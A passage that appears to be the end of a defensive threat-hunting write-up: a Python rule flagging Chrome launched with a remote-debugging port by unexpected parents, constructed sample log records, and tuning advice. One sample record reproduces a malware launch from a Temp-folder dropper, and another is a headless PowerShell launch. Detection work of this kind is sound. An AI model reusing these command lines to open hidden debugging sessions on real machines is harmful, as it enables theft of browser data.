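        # The browser spawning its own helper processes; the top-level launch is what gets alerted on.
        return None
    headless = "--headless" in cmdline.lower()
    if parent_name in LEGIT_PARENTS:
        severity, reason = "low", "remote debugging enabled by known developer tooling"
    elif USER_WRITABLE.search(parent):
        severity, reason = "high", "remote debugging enabled by a parent in a user-writable path"
    else:
        severity, reason = "medium", "remote debugging enabled by an unexpected parent"
    if headless and severity != "low":
        reason += "; headless, so no browser window is shown to the user"
    return Finding(int(event.get("ProcessId", 0)), image, parent, flag.group(1), headless, severity, reason)


def hunt(jsonl: str) -> list:
    """Run analyze() over every non-empty JSON line and collect the findings in log order."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = analyze(json.loads(line))
            if finding is not None:
                findings.append(finding)
    return findings


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed records. The first reproduces the command line from the report; the rest are assumptions.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "ProcessId": 6100, "Image": CHROME,
     "CommandLine": f'"{CHROME}" --remote-debugging-port=9222 --profile-directory="Default"',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe"},
    {"EventID": 1, "ProcessId": 6104, "Image": CHROME,
     "CommandLine": f'"{CHROME}" --remote-debugging-port=9229 --user-data-dir=C:\\dev\\profile',
     "ParentImage": r"C:\Users\user\AppData\Local\Programs\Microsoft VS Code\Code.exe"},
    {"EventID": 1, "ProcessId": 6120, "Image": CHROME,
     "CommandLine": f'"{CHROME}" --type=renderer --lang=en-US', "ParentImage": CHROME},
    {"EventID": 1, "ProcessId": 6132, "Image": CHROME,
     "CommandLine": f'"{CHROME}"', "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 6140, "Image": CHROME,
     "CommandLine": f'"{CHROME}" --headless=new --remote-debugging-port=9222',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
])

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[{f.severity.upper()}] pid={f.pid} port={f.port} parent={f.parent_image}: {f.reason}")
```

The allowlist is matched on the parent's file name only, which a dropper can trivially spoof; in production, key it on a signed, full path or a code-signing check instead, and pair this rule with the related signals the report shows (a new RUN key pointing at the same Temp folder, the wallet and browser profile reads, the outbound C2 traffic) rather than alerting on the port flag alone, since developer tooling and WebDriver use it legitimately.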